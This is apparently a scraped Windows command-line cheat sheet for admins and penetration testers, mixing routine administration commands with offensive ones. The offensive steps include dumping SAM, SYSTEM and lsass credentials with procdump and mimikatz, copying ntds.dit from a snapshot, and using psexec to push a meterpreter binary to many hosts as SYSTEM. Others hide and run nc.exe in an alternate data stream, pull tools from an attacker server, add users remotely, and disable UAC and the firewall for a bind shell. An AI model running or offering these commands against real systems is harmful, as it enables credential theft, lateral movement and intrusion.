#RooT HaXor Bang!! Bang!!
- Get entires from IPv4 neighbor cache
- Get available wireless networks via cmd and netsh
- Quick list IP addresses only
- List ALL services AND their binaries
- Export SAM from the Windows Registry to a file
- Enable remote desktop using reg
- Enable the boot log to see list of drivers loaded during startup
- Powershell cmdlet to create System Restore Point
- Check the current account for seDebugPrivilege
- Enable/disable system users via command line
- View process that is consuming the most memory using powershell
- Create an Alternate Data Stream from a file on an NTFS partition
- Export running processes in CSV format
- Lock Windows desktop using command line
- Start explorer with a file or folder selected/highlighted
- Dump VirtualBox image containing RAM and ELF headers
- Set Time Zone of the system clock
- Make folder inside a guest from the host
- Force copy meterpreter binary to remote machines & run as system
- Create n/w share called
Apps, with read access & limit to 10 conns - List all the drives under My Computer using fsutil
- Troubleshoot n/w packet drops with router statistics using pathping
- List unsigned dlls for a specific process. For system wide list
- Obtain a list of Windows XP computers on the domain using PS
- Open the System Properties window, with the
Advancedtab selected - Using the
dircommand to find Alternate Data Streams - Use
procdumpto obtain thelsassprocess memory - Run
mimikatzinminidumpmode & usemini.dmpfromprocdump - Get list of startup programs using wmic
- Add a binary to an Alternate Data Stream
- Execute a binary Alternate Data Stream Win 7/2008 using wmic
- Show config & state info for Network Access Protection enabled client
- Get computer system information, including domain name and memory, using wmic
- Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
- Secure delete a file/folder in Windows
- Show all startup entries while hiding Microsoft entries. CSV output
- Download files via commandline using PS
- Fetch the last 10 entries from the Windows Security event log, in text format
- Create a dll that runs calc on invoke
- Run a command as another user
- Get shutdown/reboot events from the last 1000 log entries using PS
- Create a new snapshot of the volume that has the AD database and log files
- Mount the snapshot
- Run a process on a remote system using wmic
- List the machines, with usernames, that were connected via RDP
- List all process that are running on your system by remote users connected via RDP
- Reset the Windows TCP\IP stack
- List logged on users
- Set a static IP on a remote box
- Bypass powershell execution policy restrictions
- List running processes every second on a remote box
- Get a list of running processes and their command line arguments on a remote system
- Remotely enable and start the Volume Shadow Copy Service
- Ping multiple IPs from
ips.txt& see live hosts - Set global proxy in Windows to point to IE proxy
- Enumerate list of drivers with complete path information
- View Group Policy Objects that have been applied to a system
- Reset the WMI repository to what it was when the OS was installed
- Create symbolic links in Windows Vista, 7 & higher
- Enable the tftp client in Vista & higher
- Obtain list of firewall rules on a local system
- Get name of current domain controller
- Look at content cached in kernel mode on IIS 7 and higher
- Quick test to check
MS15_034 - Get a list of all open Named pipes via Powershell
- Possible
VENOMdetection on VirtualBox - List RDP sessions on local or remote in list format
- Get a list of service packs & hotfixes using wmic for remote systems listed in file
- Export wireless connection profiles
- Unzip using PowerShell
- Open the Network & Sharing center
- Remotely stop/start ftp on several systems
- To quickly find large files using cmd
- Print RDP connections
- List scheduled tasks & binaries
- Display the "Stored User names and Passwords" window
- List namespaces & classes in WMI via PowerShell
- Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
- Change file extensions recurseively
- List IPs of running VirtualBox machines
- Enumerate packages with their oem inf filenames
- Install a driver package using inf file
- Malware Hunting with Mark Russinovich and the Sysinternals
- Windows Nano Server APIs
- Windows wifi hotspot using cmd
- Disable UAC via cmdline
- Turn off Windows firewall for all profiles
- List Missing Updates
- Export SAM and SYSTEM. Dump password hashes offline
- Convert Binary to base64 string to transfer across restricted RDP
- Convert Base64 string to Binary
- List services running as SYSTEM and possibly weak file permissions
- Check Bitlocker status on a remote box
- Export failed logon attempts
- Alternate Data Streams and PS
- Run the Windows Assessment tool for cpu and ram and disk
- Port forward (proxy) traffic to remote host and port
- Enable/Disable NetBIOS over TCP/IP
C:\>netsh interface ipv4 show neighbors
C:\>netsh wlan show networks mode=b
Save the following in ip.bat in %PATH%
C:\>ipconfig | find /I "pv"
Call ip from CLI
for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
C:\>reg save HKLM\SAM C:\Windows\Temp\SAM
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
bcdedit /set bootlog yes
Read via %windir%\ntbtlog.txt
PS C:\>Checkpoint-Computer -description "Restore point!"
C:\> whoami /priv | findstr "Debug"
For all privs:
C:\> whoami /priv
C:\>net user test /active:yes (no)
Get full help on the net user command:
C:\>net help user
PS C:\> (Get-Process | Sort-Object -Descending WS)[0]
C:\>type data.txt > C:\windows\explorer.exe:newads.txt
C:\> tasklist /FO CSV > tasks.txt
C:\> rundll32 user32.dll,LockWorkStation
C:\> explorer /select,C:\MyData\sample.docx
C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf
C:\> tzutil /s "Eastern Standard Time"
List available Time zones:
C:\> tzutil /l
VirtualBox
C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"
C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe
C:\> net share Apps=C:\Apps /G:everyone,READ /US:10
C:\> fsutil.exe fsinfo drives
C:\> pathping -n http://www.google.com
For system wide list, remove the process name
C:\> listdlls -u explorer.exe
Server2008
PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}
Change the number for different tabs
C:\> control sysdm.cpl,,3
C:\> dir /R | find ":$D"
Using streams sysinternals (shows path):
C:\> streams -s .
Use mimikatz minidump to get passwords
C:\> procdump -accepteula -ma lsass.exe mini.dmp
mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords
C:\> wmic startup list full
C:\> type c:\tools\nc.exe > c:\nice.png:nc.exe
Execute it (XP/2K3):
C:\> start c:\nice.png:nc.exe
C:\> wmic process call create C:\nice.png:nc.exe
https://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx
C:\> netsh nap client show configuration
C:\> wmic computersystem list /format:csv
C:\> pkgmgr /iu:"TelnetClient"
Sysinternals
C:\> sdelete -p 10 a.txt
To recursively delete folders:
C:\> sdelete -10 -r C:\data\
It covers more locations than Windows inbuilt tools
C:\> autorunsc -m -c
PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
C:\> wevtutil qe Security /c:10 /f:Text
def is XML
msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll
C:\> rundll32.exe rcalc.dll,1
You will be prompted for password
C:\> runas /noprofile /user:domain\username "mmc wf.msc"
Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *
C:\> ntdsutil sn "ac i ntds" create quit quit
Copy ntds.dit from snapshot & System hive from reg for pwd hashes
C:\> ntdsutil snapshot "list all" "mount 1" quit quit
C:\> wmic /node:ip process call create "net user dum dum /add"
C:\> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
C:\> query process *
netsh int ip reset c:\tcpresetlog.txt
Very useful during a pentest to look for domain admins
C:\> net session | find "\\"
C:\> wmic /node:remotebox nicconfig where Index=1 call EnableStatic ("192.168.1.4"), ("255.255.255.0")
PS C:\> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1
C:\> wmic /node:target process list brief /every:1
Remove /node:target for localhost
C:\> wmic /node:target process get commandline, name
C:\> sc \\target config vss start= auto
C:\> sc \\target start vss
C:\>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="
C:\> netsh winhttp import proxy source=ie
C:\> driverquery /FO list /v
Very useful during pentests
C:\> gpresult /z /h outputfile.html
Very helpful if you have a corrupt repo
C:\> winmgmt /resetrepository
C:\> mklink <link> <target>
C:\> mklink D:\newlink.txt E:\thisexists.txt
C:\> ocsetup TFTP /quiet
Pull files to a compromised server:
C:\> tftp -i attacksrv get bin.exe
C:\> netsh advfi fi sh rule name=all
Can be combined with wmic for remote systems
C:\> set log
C:\> nltest /dcname:DOMAIN
Get list of all DCs:
C:\> nltest /dclist:DOMAIN
C:\> netsh http sh ca
Useful when investigating the MS15-034 HTTP.sys vuln
C:\> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png
HTTP 416 = Vulnerable
HTTP 20X = Not vulnerable
PS C:\> [http://System.IO.Directory ]::GetFiles("\\.\\pipe\\")
C:\> vboxmanage list -l vms > a.txt
Search 'Storage' & 'Floppy'
PS C:\> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv
C:\> wmic /node:@file /output:out.txt qfe list full
C:\> netsh wlan export profile
key=clear allows plain text passwords
PS C:\> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)
control.exe /name Microsoft.NetworkandSharingCenter
Create a shortcut of this as ns in PATH for ease
C:\> wmic /node:@ips.txt /user:u /password:p process call create "net <start> msftpsvc"
C:\> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"
Run from the dir you want
for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"
C:\> schtasks /query /fo LIST /v
Weak permissions can be exploited for localprivilege escalation
C:\> rundll32 keymgr.dll,KRShowKeyMgr
PS C:\> gwmi -n root -cl __Namespace | Select name
PS C:\> gwmi -n root\cimv2 -li
C:\> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK
csv to xls for eg
C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"
for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"
C:\> pnputil -e
C:\> pnputil -i -a path_to_inf
https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx
Starting a wifi hotspot using Windows cmd with ssid name hotspotname and key password
C:\> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f
Useful if you have a bind shell
C:\> netsh advfirewall set allprofiles state off
PS C:\> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title
C:\>reg save HKLM\SAM SAM
C:\>reg save HKLM\SYSTEM SYSTEM
PS C:\> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))
PS C:\> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
manage-bde -status -cn <box>
Use wmic /node:@ips.txt & process alias for multiple.
PS C:\> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv
- List all ADS for all files in current dir
PS C:\> gi * -s *
- Read ADS
PS C:\> gc <file> -s <ADSName>
- Create ADS using text input
PS C:\> sc <file> -s <ADSName>
- Delete ADS
PS C:\> ri <file> -s <ADSName>
C:\> winsat cpuformal -v
C:\> winsat memformal -v
C:\> winsat diskformal -v
C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]
Step 1. Get Index of Network Adapter:
C:\> wmic nicconfig get caption,index
Step 2. Use the index
C:\> wmic nicconfig where index=1 call SetTcpipNetbios 1
0-Def
1-En
2-Dis
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent